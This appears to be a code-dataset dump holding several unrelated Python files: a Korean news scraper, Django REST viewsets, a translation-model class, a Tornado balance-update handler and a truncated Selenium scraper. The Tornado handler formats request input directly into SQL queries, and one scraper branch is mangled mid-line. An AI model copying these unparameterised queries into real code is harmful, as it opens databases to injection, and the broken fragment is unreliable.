\"GISA FILE NOT EXISTS\" in bs.select(\"p.mgt18\")[0].text:\n #기사가 삭제됨\n print(\"Article was deleted.\")\n continue\n\n elif news_site == 'edaily':\n text = res.text.encode('latin-1').decode('cp949')\n bs = BeautifulSoup(text, 'html.parser')\n if bs.select('div#viewarea > h4'):\n title = bs.select(\"div#viewarea > h4\")[0].text\n\n base_dtm = bs.select(\"div#viewarea > div.pr > p.newsdate\")[0].text.split('|')[1].replace('.','-').strip()\n contents = bs.select(\"span#viewcontent_inner\")[0].text.encode('utf-8','ignore').decode('utf-8') #깨진문자가 있다면 이과정에서 무시된다.\n elif len(bs.select(\"div.left > p > a > img\")) > 0:\n # 사진 기사\n \"\"\"\"\"\"\n return_val =2\n elif len(bs.select('h4.newstitle')) > 0 :\n title = bs.select(\"h4.newstitle\")[0].text\n\n base_dtm = bs.select(\"p.newsdate\")[0].text.split('|')[1].replace('.','-').strip()\n contents = bs.select(\"span#viewcontent_inner\")[0].text\n\n\n elif news_site == 'mk':\n text = res.text.encode('latin-1').decode('cp949')\n bs = BeautifulSoup(text, 'html.parser')\n title = bs.select(\"div#top_header > div > div > h1\")[0].text\n\n base_dtm = bs.select(\"div#top_header > div > div > div.news_title_author > ul > li.lasttime\")[0].text.split(' :')[1].strip().replace('.','-')\n contents = bs.select(\"div#article_body\")[0].text\n\n elif news_site == 'fnnews':# finanncial news\n text = res.text\n bs = BeautifulSoup(text, 'html.parser')\n title = bs.select(\"div#container > div > div.article_head > h1\")[0].text\n\n base_dtm = bs.select(\"div#container > div > div.article_head > div > em\")[1].text.split(' : ')[1].replace('.','-')\n contents = bs.select(\"div#article_content > div\")[0].text\n\n elif news_site == 'hankyung':# 한국경제\n # 얘네는 응답이 chunked reponse로 온다.\n # 
이경우\n # [byte수]\\r\\n\n # 데이터\n # \\r\\n[byte수]\\r\\n\n # 데이터\n # 반복...\n # \\r\\n0\\r\\n\\r\\n\n\n type = None\n if res.text.startswith(' div.artlcle_top > h2.tit')[0].text\n\n base_dtm = bs.select('div#container > div.wrap_container > div > div.info_article > div.date > span')[0].text[3:]\n contents = bs.select('div#newsView')[0].text\n\n elif type == 'hei':\n title = bs.select('div#container > section > h1')[0].text\n base_dtm = bs.select('div#container > section > div > div.atc-info > span')[0].text[3:]\n\n contents = bs.select('article#newsView')[0].text\n elif type == 'plus':\n title = bs.select('section#container > section.service_cnt > article > article > header > h2')[0].text\n base_dtm = bs.select('section#container > section.service_cnt > article > article > p.info > span')[1].text\n\n contents = bs.select('div.articleContent')[0].text\n\n elif news_site == 'newspim':# newspim\n if not res is None :\n text = res.text\n\n if '/anda/view' in text:\n return_val = 2 # no need to download, premium news\n elif \"document.location.href='/';\" in text:\n return_val = 2 # article is not exists\n else :\n bs = BeautifulSoup(text, 'html.parser')\n title = bs.select(\"div.bodynews_title > h1\")[0].text\n\n base_dtm = bs.select(\"div.bodynews_title > ul > li.writetime\")[0].text.split(' : ')[1].replace('년','-').replace('월','-').replace('일','')\n contents = bs.select(\"div#news_contents\")[0].text\n else:\n # 404 not found\n return_val = 3\n\n elif news_site == 'etoday':# etoday\n text = res.text\n if '��스가 존재하지 않습니다' in text:\n return_val = 3\n else:\n try:\n bs = BeautifulSoup(text, 'lxml')\n title = bs.select(\"#article_title\")[0].text\n\n base_dtm = bs.select(\"#ViewHeader > div.byline > em\")[0].text.split(' : ')[1]\n if len(bs.select(\"#newsContent\")) > 0 :\n contents = bs.select(\"#newsContent\")[0].text.strip()\n else:\n contents = bs.select(\"#block_body > div > div > div.cont_left_article\")[0].text.strip()\n except:\n # 일단 패스\n continue\n\n elif news_site == 'yonhapnews':#yonhapnews\n if '/photos/' in res.url: #사진 기사일경우 스크랩하지 않는다.\n return_val = 2\n else:\n text = res.content.decode()\n bs = BeautifulSoup(text, 'html.parser')\n title = bs.select(\"#articleWrap > h1\")[0].text\n\n base_dtm = bs.select(\"div.share-info > span > em\")[0].text.replace('/','-')\n contents = bs.select(\"#articleWrap > div.article\")[0].text\n\n elif news_site == 'biz.chosun':# biz chosun\n if res.text.startswith('\n next_url = res.text.split('url=')[1][:-3]\n res = requests.get(next_url)\n text =res.content.decode()\n bs = BeautifulSoup(text, 'html.parser')\n title = bs.select(\"#title_text\")[0].text\n\n base_dtm = bs.select(\"span.date_text\")[0].text.split(' : ')[1].strip().replace('.','-')\n contents = bs.select(\"#par\")[0].text\n\n else :\n text =res.content.decode()\n bs = BeautifulSoup(text, 'html.parser')\n\n if bs.select('head > title')[0].text == '404 Not Found':\n return_val = 3\n\n else:\n title = bs.select(\"#title_text\")[0].text\n base_dtm = bs.select(\"#date_text\")[0].text.split(' : ')[1].strip().replace('.','-')\n contents = bs.select(\"#article_2011\")[0].text\n\n elif news_site == 'ajunews': # ajunews\n text = res.text\n bs = BeautifulSoup(text, 'html.parser')\n\n if len(bs.select('body > div > div.etc-body > div.etc-url-error-desc > div')) > 0 :\n # 페이지를 찾을 수 없음\n return_val = 3\n else:\n try:\n title = bs.select(\"div.ma680-0001-head-block > h2\")[0].text.strip()\n base_dtm = bs.select(\"li.regi_date.cus\")[0].text.split(' : ')[1]\n if len(bs.select(\"#articleBody > div\")) > 0 
:\n contents = bs.select(\"#articleBody > div\")[0].text.strip()\n elif len(bs.select(\"#articleBody\")) > 0 :\n contents = bs.select(\"#articleBody\")[0].text.strip()\n except :\n continue\n\n elif news_site == 'thebell':\n # http://www.thebell.co.kr/front/free/contents/news/article_view.asp?svccode=&page=1&sort=thebell_check_time&key=201309060100009530000521\n next_url = 'http://www.thebell.co.kr/front/free/contents/news/article_view.asp?svccode=&page=1&sort=thebell_check_time&key=' + url_qry.get('key')[0]\n res = requests.get(next_url)\n\n text = res.text\n bs = BeautifulSoup(text, 'html.parser')\n if len( bs.select(\"#article_main > span > b\")) > 0 and '유료' in bs.select(\"#article_main > span > b\")[0].text:\n return_val = 3 # no need to downlaod\n else:\n title = bs.select(\"li.title > h1\")[0].text.strip()\n base_dtm = bs.select(\"div.title_bar > ul > li.left\")[0].text.split('공개 ')[-1]\n contents = bs.select(\"#article_main\")[0].text.strip()\n\n elif news_site == 'seoulfn':\n # http://www.seoulfn.com/news/articleView.html?idxno=39351&ion=section4\n text = res.text.encode('latin-1').decode('cp949')\n bs = BeautifulSoup(text, 'html.parser')\n if len(bs.select(\"td > b\"))>0 and bs.select(\"td > b\")[0].text.startswith('존재하지') :\n return_val = 3\n elif len(bs.select(\"div.phtit\")) > 0 :\n #photo news\n return_val = 2\n else:\n title = bs.select(\"#font_title\")[0].text.strip()\n base_dtm = bs.select(\"#font_date > span\")[0].text.strip()[:20].replace('  ',' ')#space 아님\n contents = bs.select(\"#CmAdContent\")[0].text.strip()\n\n\n else:\n print(\"Unknown news site. FATAL ERROR\")\n exit(-1)\n\n if return_val == 1:\n sub_dir = base_dtm[0:4]\n if not os.path.isdir(\"articles/\" + sub_dir):\n os.mkdir(\"articles/\" + sub_dir)\n dest_file = \"articles/\" + sub_dir + \"/\" + dir_postfix\n\n if not os.path.isfile(dest_file) or ( os.path.isfile(dest_file) and os.stat(dest_file).st_size == 0 ):\n f = open(dest_file,'w',encoding=\"utf-8\")\n f.write(title+\"\\n\"+ base_dtm+\"\\n\"+ contents)\n f.close()\n\n # is_downloaeded\n # 0: not downloaded\n # 1: downloaeded\n # 2: not need to download\n # 3: 404 not found\n qry = \"UPDATE article_title set is_downloaded = %d where id = %d ;\" % (return_val, row[0])\n cur.execute(qry)\n conn.commit()\n else:\n # is_downloaeded\n # 0: not downloaded\n # 1: downloaeded\n # 2: not need to download\n # 3: 404 not found\n qry = \"UPDATE article_title set is_downloaded = %d where id = %d ;\" % (return_val, row[0])\n cur.execute(qry)\n conn.commit()\n\n\n\n\n\n\n\n","sub_path":"2_ncc.py","file_name":"2_ncc.py","file_ext":"py","file_size_in_byte":24192,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"60165319","text":"from datetime import datetime\n\nfrom django.conf import settings\nfrom django.core.files.storage import default_storage\nfrom django.shortcuts import get_object_or_404\nfrom rest_framework import generics, status\nfrom rest_framework.decorators import action, detail_route, permission_classes,list_route\nfrom rest_framework.generics import GenericAPIView\nfrom rest_framework.mixins import UpdateModelMixin\nfrom rest_framework.pagination import LimitOffsetPagination\nfrom rest_framework.parsers import FormParser, JSONParser, MultiPartParser\nfrom rest_framework.permissions import IsAuthenticated\nfrom rest_framework.response import Response\nfrom rest_framework.viewsets import ModelViewSet\n\nfrom mrelife.commons.common_fnc import CommonFuntion\nfrom mrelife.events.models import Event, 
EventModelHouse\nfrom mrelife.modelhouses.models import (\n ModelHouse,\n ModelHouseMedia,\n ModelHouseOutletStore,\n ModelHouseTag,\n ModelHouseUser,\n OrderModelHouse\n)\nfrom mrelife.modelhouses.serializers import (\n ModelHouseNestedSerializer,\n ModelHouseSerializer,\n OrderModelHouseSerializer,\n OrderModelHouseStatusSerializer\n)\nfrom mrelife.outletstores.models import OutletStore\nfrom mrelife.tags.models import Tag\nfrom mrelife.utils.groups import GroupUser, IsAdmin, IsStore, IsSub\nfrom mrelife.utils.model_house_permission import ModelHousePermission\nfrom mrelife.utils.order_model_house_permission import OrderMHUserListPermission, OrderMHViewadminPermission\nfrom mrelife.utils.querys import get_or_none\nfrom mrelife.utils.relifeenum import MessageCode\n\n\nclass ModelHouseViewSet(ModelViewSet):\n queryset = ModelHouse.objects.all()\n serializer_class = ModelHouseSerializer\n permission_classes = (IsAuthenticated, ModelHousePermission,)\n parser_class = (FormParser, MultiPartParser, JSONParser)\n pagination_class = LimitOffsetPagination\n\n def create(self, request, *args, **kwargs):\n \"\"\"\n POST:\n store: int\n events: []\n tags: []\n medias: []\n \"\"\"\n request.data['create_user'] = request.user.id\n obj = super(ModelHouseViewSet, self).create(request, *args, **kwargs)\n house = ModelHouse.objects.get(pk=obj.data['id'])\n if not (IsStore(request.user) or IsSub(request.user)):\n try:\n store = OutletStore.objects.get(pk=int(request.data.get('store')))\n except Exception:\n store = None\n else:\n store = request.user.store\n ModelHouseUser.objects.create(user_id=request.user.id, model_house=house)\n\n if store is None:\n house.delete()\n return Response({\n 'status': False,\n 'messageCode': 'MH001',\n 'messageParams': {},\n 'data': {}\n }, status=status.HTTP_404_NOT_FOUND)\n\n events = request.data.get('events')\n if events is not None:\n for event in events:\n try:\n EventModelHouse.objects.create(event_id=event, model_house=house)\n except Exception:\n pass\n\n tags = request.data.get('tags')\n if tags is not None:\n for tag_name in tags:\n if not (tag_name == '' or tag_name is None):\n tag, created = Tag.objects.get_or_create(name=tag_name)\n ModelHouseTag.objects.create(tag=tag, model_house=house)\n\n ModelHouseOutletStore.objects.create(outlet_store=store, model_house=house)\n\n medias = request.data.getlist('medias')\n count = 0\n for media in medias:\n if count < 5:\n file = default_storage.save(media.name, media)\n ModelHouseMedia.objects.create(model_house=house, url=settings.MEDIA_URL + file)\n count += 1\n return obj\n\n def retrieve(self, request, *args, **kwargs):\n self.serializer_class = ModelHouseNestedSerializer\n return super(ModelHouseViewSet, self).retrieve(request, *args, **kwargs)\n\n def update(self, request, *args, **kwargs):\n obj = super(ModelHouseViewSet, self).update(request, *args, **kwargs)\n return obj\n\n @detail_route(methods=['post'])\n def add_event(self, request, *args, **kwargs):\n \"\"\"\n POST:\n events: []\n \"\"\"\n house = ModelHouse.objects.get(pk=kwargs['pk'])\n events = request.data.get('events')\n if events is not None:\n for event in events:\n try:\n if not house.events.filter(event_id=event).exists():\n EventModelHouse.objects.create(event_id=event, model_house=house)\n except Exception:\n pass\n return super(ModelHouseViewSet, self).retrieve(request, *args, **kwargs)\n\n @detail_route(methods=['post'])\n def remove_event(self, request, *args, **kwargs):\n \"\"\"\n POST:\n events: []\n \"\"\"\n house = 
ModelHouse.objects.get(pk=kwargs['pk'])\n events = request.data.get('events')\n if events is not None:\n for event in events:\n try:\n _event = EventModelHouse.objects.filter(event_id=event, model_house=house)\n _event.delete()\n except Exception:\n pass\n return super(ModelHouseViewSet, self).retrieve(request, *args, **kwargs)\n\n @detail_route(methods=['post'])\n def add_tag(self, request, *args, **kwargs):\n \"\"\"\n POST:\n tags: []\n \"\"\"\n house = ModelHouse.objects.get(pk=kwargs['pk'])\n tags = request.data.get('tags')\n if tags is not None:\n for tag_name in tags:\n if not (tag_name == '' or tag_name is None):\n tag, created = Tag.objects.get_or_create(name=tag_name)\n if created or not house.tags.filter(tag=tag).exists():\n ModelHouseTag.objects.create(tag=tag, model_house=house)\n return super(ModelHouseViewSet, self).retrieve(request, *args, **kwargs)\n\n @detail_route(methods=['post'])\n def remove_tag(self, request, *args, **kwargs):\n \"\"\"\n POST:\n tags: []\n \"\"\"\n house = ModelHouse.objects.get(pk=kwargs['pk'])\n tags = request.data.get('tags')\n if tags is not None:\n for tag in tags:\n try:\n _tag = ModelHouseTag.objects.filter(tag_id=tag, model_house=house)\n _tag.delete()\n except Exception:\n pass\n return super(ModelHouseViewSet, self).retrieve(request, *args, **kwargs)\n\n @detail_route(methods=['post'])\n def add_media(self, request, *args, **kwargs):\n \"\"\"\n POST:\n medias: []\n \"\"\"\n house = ModelHouse.objects.get(pk=kwargs['pk'])\n medias = request.data.getlist('medias')\n count = 0\n for media in medias:\n if count < 5:\n file = default_storage.save(media.name, media)\n ModelHouseMedia.objects.create(model_house=house, url=settings.MEDIA_URL + file)\n count += 1\n return super(ModelHouseViewSet, self).retrieve(request, *args, **kwargs)\n\n @detail_route(methods=['post'])\n def remove_media(self, request, *args, **kwargs):\n \"\"\"\n POST:\n medias: []\n \"\"\"\n house = ModelHouse.objects.get(pk=kwargs['pk'])\n medias = request.data.get('medias')\n if medias is not None:\n for media in medias:\n try:\n _media = ModelHouseMedia.objects.get(pk=media)\n _media.delete()\n except Exception:\n pass\n return super(ModelHouseViewSet, self).retrieve(request, *args, **kwargs)\n\n @detail_route(methods=['post'])\n def add_user(self, request, *args, **kwargs):\n \"\"\"\n POST:\n users: [int]\n \"\"\"\n house = ModelHouse.objects.get(pk=kwargs['pk'])\n users = request.data.get('users')\n if users is not None:\n for user in users:\n try:\n if not house.users.filter(user_id=user).exists():\n ModelHouseUser.objects.create(user_id=user, model_house=house)\n except Exception:\n pass\n return super(ModelHouseViewSet, self).retrieve(request, *args, **kwargs)\n\n @detail_route(methods=['post'])\n def remove_user(self, request, *args, **kwargs):\n \"\"\"\n POST:\n users: [int]\n \"\"\"\n house = ModelHouse.objects.get(pk=kwargs['pk'])\n users = request.data.get('users')\n if users is not None:\n for user in users:\n try:\n _user = ModelHouseUser.objects.filter(user_id=user, model_house=house)\n _user.delete()\n except Exception:\n pass\n return super(ModelHouseViewSet, self).retrieve(request, *args, **kwargs)\n\n\nclass OrderModelHouseViewSet(ModelViewSet):\n queryset = OrderModelHouse.objects.all().filter(is_active=1)\n serializer_class = OrderModelHouseSerializer\n pagination_class = LimitOffsetPagination\n permission_classes = (IsAuthenticated, OrderMHViewadminPermission,)\n\n def list(self, request):\n self.queryset = 
OrderModelHouse.objects.filter(is_active=1)\n        return super(OrderModelHouseViewSet, self).list(request)\n\n    def retrieve(self, request, pk=None):\n        try:\n            queryset = OrderModelHouse.objects.all().filter(is_active=1)\n            orderModelObject = get_object_or_404(queryset, pk=pk)\n            serializer = OrderModelHouseSerializer(orderModelObject)\n            return Response(CommonFuntion.resultResponse(True, serializer.data, MessageCode.OMH002.value, \"\"), status=status.HTTP_200_OK)\n        except Exception as e:\n            return Response(CommonFuntion.resultResponse(False, \"\", MessageCode.OMH003.value, \"\"), status=status.HTTP_404_NOT_FOUND)\n\n    def create(self, request):\n        request.data['create_user_id'] = request.user.id\n        serializer = OrderModelHouseSerializer(data=request.data)\n        if serializer.is_valid():\n            serializer.save(is_active=settings.IS_ACTIVE, created=datetime.now(), updated=datetime.now())\n            return Response(CommonFuntion.resultResponse(True, serializer.data, MessageCode.OMH004.value, \"\"), status=status.HTTP_201_CREATED)\n        return Response(CommonFuntion.resultResponse(False, \"\", MessageCode.OMH005.value, serializer.errors), status=status.HTTP_400_BAD_REQUEST)\n\n    def update(self, request, pk=None):\n        try:\n            request.data['create_user_id'] = request.user.id\n            queryset = OrderModelHouse.objects.all().filter(is_active=1)\n            orderModelObject = get_object_or_404(queryset, pk=pk)\n            serializer = OrderModelHouseSerializer(orderModelObject, data=request.data)\n            if serializer.is_valid():\n                serializer.save(is_active=settings.IS_ACTIVE, created=datetime.now(), updated=datetime.now())\n                return Response(CommonFuntion.resultResponse(True, serializer.data, MessageCode.OMH006.value, \"\"), status=status.HTTP_200_OK)\n            return Response(CommonFuntion.resultResponse(False, \"\", MessageCode.OMH007.value, serializer.errors), status=status.HTTP_400_BAD_REQUEST)\n        except Exception as e:\n            return Response(CommonFuntion.resultResponse(False, \"\", MessageCode.OMH007.value, \"\"), status=status.HTTP_404_NOT_FOUND)\n\n    def destroy(self, request, pk=None):\n        try:\n            queryset = OrderModelHouse.objects.all().filter(is_active=1)\n            orderModelObject = get_object_or_404(queryset, pk=pk)\n            data = {\"is_active\": settings.IS_INACTIVE}\n            serializer = OrderModelHouseSerializer(orderModelObject, data=data, partial=True)\n            if serializer.is_valid():\n                serializer.save(updated=datetime.now())\n                return Response(CommonFuntion.resultResponse(True, serializer.data, MessageCode.OMH008.value, \"\"), status=status.HTTP_200_OK)\n            return Response(CommonFuntion.resultResponse(False, \"\", MessageCode.OMH009.value, serializer.errors), status=status.HTTP_400_BAD_REQUEST)\n        except Exception as e:\n            return Response(CommonFuntion.resultResponse(False, \"\", MessageCode.OMH007.value, \"\"), status=status.HTTP_404_NOT_FOUND)\n\n    @list_route(methods=['get'])\n    def selfGetlistBooking(self, request, pk=None):\n        self.queryset = OrderModelHouse.objects.all().filter(is_active=1).filter(create_user_id=request.user.id)\n        return super(OrderModelHouseViewSet, self).list(request)\n\n\nclass updateStatus(GenericAPIView, UpdateModelMixin):\n    queryset = OrderModelHouse.objects.all()\n    serializer_class = OrderModelHouseStatusSerializer\n    permission_classes = (IsAuthenticated,)\n\n    def put(self, request, pk=None, *args, **kwargs):\n        try:\n            request.data['create_user_id'] = request.user.id\n            queryset = OrderModelHouse.objects.all().filter(is_active=1)\n            orderModelObject = get_object_or_404(queryset, pk=pk)\n            serializer = OrderModelHouseSerializer(orderModelObject, 
data=request.data, partial=True)\n if serializer.is_valid():\n serializer.save(is_active=settings.IS_ACTIVE, created=datetime.now(), updated=datetime.now())\n return Response(CommonFuntion.resultResponse(True, serializer.data, MessageCode.OMH006.value, \"\"), status=status.HTTP_200_OK)\n return Response(CommonFuntion.resultResponse(False, \"\", MessageCode.OMH007.value, serializer.errors), status=status.HTTP_400_BAD_REQUEST)\n except Exception as e:\n return Response(CommonFuntion.resultResponse(False, \"\", MessageCode.OMH007.value, \"\"), status=status.HTTP_404_NOT_FOUND)\n","sub_path":"service/mrelife/modelhouses/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":14095,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"650382547","text":"from nmtpytorch.layers.transformers.cross_modal_encoder import CrossModalEncoder\nfrom nmtpytorch.models import SimultaneousTFNMT\n\n\nclass EncoderCrossMMSimultaneousTFNMT(SimultaneousTFNMT):\n\n def __init__(self, opts):\n super().__init__(opts)\n assert not self.opts.model['enc_bidirectional'], \\\n 'Bidirectional TF encoder is not currently supported for simultaneous MT.'\n\n def set_defaults(self):\n super().set_defaults()\n self.defaults.update({\n # Decoding/training simultaneous NMT args\n 'enc_fusion': 'sum', # The encoder fusion type.Can be: 'sum' or 'gate'. Default 'sum'.\n 'enc_fusion_lnorm': True, # Whether to apply layer normalization after fusing the encoder.\n 'mm_attn_heads': 8, # The number of multimodal attention heads.\n 'enc_fusion_dropout': 0.0, # The amount of dropout after the fusion.\n })\n\n def _create_image_encoder(self):\n return CrossModalEncoder(\n input_size=self.opts.model['aux_dim'],\n proj_dim=self.opts.model['aux_proj_dim'],\n proj_activ=self.opts.model['aux_proj_activ'],\n layer_norm=self.opts.model['aux_lnorm'],\n l2_norm=self.opts.model['aux_l2norm'],\n dropout=self.opts.model['aux_dropout'],\n feat_mode=self.opts.model['feat_mode'],\n model_dim=self.opts.model['model_dim'],\n mm_attn_heads=self.opts.model['mm_attn_heads'],\n attn_dropout=self.opts.model['attn_dropout'],\n fusion=self.opts.model['enc_fusion'],\n fusion_lnorm=self.opts.model['enc_fusion_lnorm'],\n fusion_dropout=self.opts.model['enc_fusion_dropout'],\n boxes_dim=self.opts.model['img_boxes_dim']\n )\n\n def get_attention_weights(self):\n return {'encoder_src': self.encoders['src'].get_attention_weights(),\n 'encoder_img': self.encoders['image'].get_attention_weights(),\n 'decoder': self.dec.get_attention_weights()}\n\n def cache_enc_states(self, batch, **kwargs):\n \"\"\"\n Caches the encoder hidden states, by first computing the textual hidden states, and then combining them with the\n visual encoder using the cross modal encoder.\n :param batch: The batch.\n :param kwargs: Any additional args.\n \"\"\"\n enc_txt = self.encoders['src'](batch['src'])\n _ = self.encoders['image'](batch['image'], enc_txt=enc_txt)\n\n def get_enc_state_dict(self, up_to=int(1e6)):\n \"\"\"\n Get the encoder states. 
In the cross modal case retrieve the ones from the cross modal image encoder, as they\n        also contain the textual encoder hidden states.\n        :param up_to: The number of timesteps to return.\n        :return: The encoder states up to a certain timestep.\n        \"\"\"\n        return {'src': self.encoders['image'].get_states(up_to=up_to)}\n","sub_path":"nmtpytorch/models/snmt_tf_enc_cmm.py","file_name":"snmt_tf_enc_cmm.py","file_ext":"py","file_size_in_byte":2926,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"5219389","text":"# -*- coding: utf-8 -*-\r\nfrom util import validate_date_str\r\nimport tornado.web\r\nfrom datetime import datetime, timedelta\r\nimport json\r\n\r\nclass UpdateBalanceHandler(tornado.web.RequestHandler):\r\n    @property\r\n    def logger(self):\r\n        return self.application.logger\r\n\r\n    @property\r\n    def mysql_db(self):\r\n        return self.application.mysql_db\r\n\r\n    @property\r\n    def redis_client(self):\r\n        return self.application.redis_client\r\n\r\n    def stats_curday_balance(self, uid, start_time, end_time):\r\n        data = {\"order_balance\": None, \"cancel_balance\": None, \"updateTime\": None}\r\n\r\n        sql = \"select sum(ticketPrices),updateTime from order_ticket where uid='%s' \\\r\n            and status=1 and updateTime>='%s' and updateTime<'%s'\" % (uid, start_time, end_time)\r\n        qs, err = self.mysql_db.execute_query_sql(sql)\r\n        if err is not None:\r\n            return data, err\r\n\r\n        self.logger.info(\"order balance: %s\" % str(qs))\r\n        if qs is None or len(qs) == 0:\r\n            return data, None\r\n\r\n        data[\"order_balance\"] = qs[0][0]\r\n        data[\"updateTime\"] = qs[0][1].strftime(\"%Y-%m-%d %H:%M:%S\")\r\n\r\n        sql = \"select sum(ticketPrices),updateTime from order_cancel where uid='%s' \\\r\n            and cancelStatus=1 and updateTime>='%s' and updateTime<'%s'\" % (uid, start_time, end_time)\r\n        qs, err = self.mysql_db.execute_query_sql(sql)\r\n        if err is not None:\r\n            return data, err\r\n\r\n        self.logger.info(\"cancel balance: %s\" % str(qs))\r\n        if qs is None or len(qs) == 0:\r\n            return data, None\r\n\r\n        data[\"cancel_balance\"] = qs[0][0]\r\n        data[\"updateTime\"] = qs[0][1].strftime(\"%Y-%m-%d %H:%M:%S\")\r\n\r\n        return data, None\r\n\r\n    def cmp_update_time(self, update_time, start_time, end_time):\r\n        s_time = datetime.strptime(update_time.strftime(\"%Y-%m-%d\"), \"%Y-%m-%d\")\r\n        stime = datetime.strptime(start_time.split(\" \")[0], \"%Y-%m-%d\")\r\n        etime = datetime.strptime(end_time.split(\" \")[0], \"%Y-%m-%d\")\r\n\r\n        self.logger.info(\"s_time:%s stime: %s etime:%s\" % (s_time, stime, etime))\r\n        if s_time >= stime or s_time >= etime:\r\n            return True\r\n        return False\r\n\r\n    def valid_request_time(self, start_time, end_time):\r\n        if validate_date_str(start_time, \"%Y-%m-%d %H:%M:%S\") == False or \\\r\n           validate_date_str(end_time, \"%Y-%m-%d %H:%M:%S\") == False:\r\n            return True\r\n\r\n        c1 = datetime.strptime(start_time, \"%Y-%m-%d %H:%M:%S\")\r\n        c2 = datetime.strptime(end_time, \"%Y-%m-%d %H:%M:%S\")\r\n\r\n        self.logger.info(\"c1:%s c2:%s\" % (c1, c2))\r\n        if c1 + timedelta(days=1) < c2 or c1 > c2:\r\n            return True\r\n        return False\r\n\r\n    def get(self):\r\n        self.logger.info(\"%s%s?%s\" % (self.request.host, self.request.path, self.request.query))\r\n\r\n        uid = self.get_argument(\"uid\", default=None, strip=True)\r\n        start_time = self.get_argument(\"start_time\", default=None, strip=True)\r\n        end_time = self.get_argument(\"end_time\", default=None, strip=True)\r\n\r\n        self.set_header(\"Content-Type\", \"application/json;charset=UTF-8\")\r\n        if uid is None or 
start_time is None or end_time is None:\r\n            self.write({\"errcode\": -1, \"errmsg\": r\"时间参数错误\", \"data\": {}})\r\n            self.finish()\r\n            return\r\n\r\n        if self.valid_request_time(start_time, end_time):\r\n            self.logger.error(r\"时间参数越界\")\r\n            self.write({\"errcode\": -1, \"errmsg\": r\"时间参数越界\", \"data\": {}})\r\n            self.finish()\r\n            return\r\n\r\n        sql = \"select totalBalance,updateTime from account_balance where uid='%s' order by updateTime desc limit 1\" % uid\r\n        qs, err = self.mysql_db.execute_query_sql(sql)\r\n        if err is not None:\r\n            self.write({\"errcode\": -1, \"errmsg\": str(err), \"data\": {}})\r\n            self.finish()\r\n            return\r\n\r\n        if qs is None or len(qs) == 0:\r\n            self.write({\"errcode\": -1, \"errmsg\": r\"非法uid\", \"data\": {}})\r\n            self.finish()\r\n            return\r\n\r\n        total_balance = qs[0][0]\r\n        update_time = qs[0][1]\r\n\r\n        self.logger.info(\"total balance: %s update_time:%s\" % (total_balance, update_time))\r\n        if self.cmp_update_time(update_time, start_time, end_time) == True:\r\n            self.logger.info(r\"己经更新过余额\")\r\n            self.write({\"errcode\": 0, \"errmsg\": r\"己经更新过余额\", \"data\": {}})\r\n            self.finish()\r\n            return\r\n\r\n        data, err = self.stats_curday_balance(uid, start_time, end_time)\r\n        if err is not None:\r\n            self.logger.info(err)\r\n            self.write({\"errcode\": -1, \"errmsg\": str(err), \"data\": {}})\r\n            self.finish()\r\n            return\r\n\r\n        self.logger.info(\"query balance: %s\" % json.dumps(data))\r\n        if data[\"order_balance\"] is None and data[\"cancel_balance\"] is None:\r\n            self.logger.info(\"%s-%s无交易余额\" % (start_time, end_time))\r\n            self.write({\"errcode\": 0, \"errmsg\": \"%s-%s无交易余额\" % (start_time, end_time), \"data\": {}})\r\n            self.finish()\r\n            return\r\n\r\n        trans_balance = 0.0\r\n        if data[\"order_balance\"] is not None:\r\n            trans_balance = float(data[\"order_balance\"])\r\n\r\n        if data[\"cancel_balance\"] is not None:\r\n            trans_balance = trans_balance - float(data[\"cancel_balance\"])\r\n\r\n        balance = total_balance - trans_balance\r\n        self.logger.info(\"total_balance: %f trans_balance: %f balance: %f\" % (total_balance, trans_balance, balance))\r\n        hdata = {\r\n            \"totalBalance\": balance,\r\n            \"lastTransMoney\": trans_balance,\r\n            \"uid\": uid,\r\n            \"updateTime\": datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\"),\r\n            \"statsTime\": data[\"updateTime\"],\r\n            \"operator\": 1\r\n        }\r\n\r\n        self.logger.info(\"hdata: %s\" % json.dumps(hdata))\r\n\r\n        if self.redis_client.hset(\"ticket-uid\", uid, balance) == False:\r\n            self.logger.info(r\"更新交易余额失败\")\r\n            self.write({\"errcode\": -1, \"errmsg\": r\"更新交易余额失败\", \"data\": hdata})\r\n            self.finish()\r\n            return\r\n\r\n        if self.redis_client.set(\"ticket_balance_uid_%s\" % uid, balance) is None:\r\n            self.logger.info(r\"更新缓存余额失败\")\r\n            self.write({\"errcode\": -1, \"errmsg\": r\"更新缓存余额失败\", \"data\": hdata})\r\n            self.finish()\r\n            return\r\n\r\n        if self.mysql_db.insert(\"account_balance\", hdata) is not None:\r\n            self.logger.info(r\"更新余额失败\")\r\n            self.write({\"errcode\": -1, \"errmsg\": r\"更新余额失败\", \"data\": hdata})\r\n            self.finish()\r\n            return\r\n\r\n        if balance < 0.0:\r\n            self.logger.info(r\"余额不足\")\r\n            self.write({\"errcode\": 0, \"errmsg\": r\"余额不足\", \"data\": hdata})\r\n        else:\r\n            self.logger.info(r\"交易正常\")\r\n            self.write({\"errcode\": 0, \"errmsg\": r\"交易正常\", \"data\": hdata})\r\n        self.finish()\r\n\r\n        
self.logger.info(\"=====================end\")\r\n","sub_path":"3rd_party/nginx.bak/home/work/ticket_server/admin_update_balance.py","file_name":"admin_update_balance.py","file_ext":"py","file_size_in_byte":7202,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"573994953","text":"import re\n\nimport lxml\nfrom selenium import webdriver\n\nlink_url = \"https://www.baidu.com/bh/dict/ydxx_8158835209873076610?tab=%E6%A6%82%E8%BF%B0&title=%E8%82%9D%E7%99%8C&contentid=ydxx_8158835209873076610&query=%E8%82%9D%E7%99%8C&sf_ref=dict_home&from=dicta\"\n\ndriver = webdriver.Chrome()\ndriver.maximize_window()\ndriver.get(link_url)\n\n# Grab the page source\nhtml_source = driver.page_source\n# Key step: parse the source with lxml\nhtml = lxml.html.fromstring(html_source)\n# Collect all text nodes under the target tag\nitems = html.xpath(\"//div[@id='y_prodsingle']//text()\")\n# Regex matching the following: ^\\s+ leading whitespace, \\s+$ trailing whitespace, \\n newlines\npattern = re.compile(\"^\\s+|\\s+$|\\n\")\n\nclause_text = \"\"\nfor item in items:\n    # Replace every match with the empty string, i.e. strip the matched parts and keep only the text\n    line = re.sub(pattern, 